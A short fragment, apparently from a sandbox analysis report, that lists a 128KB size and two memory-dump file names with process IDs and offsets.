128KB
-
memory/2460-161-0x0000000000000000-mapping.dmp
-
memory/2496-162-0x0000000000000000-mapping.dmp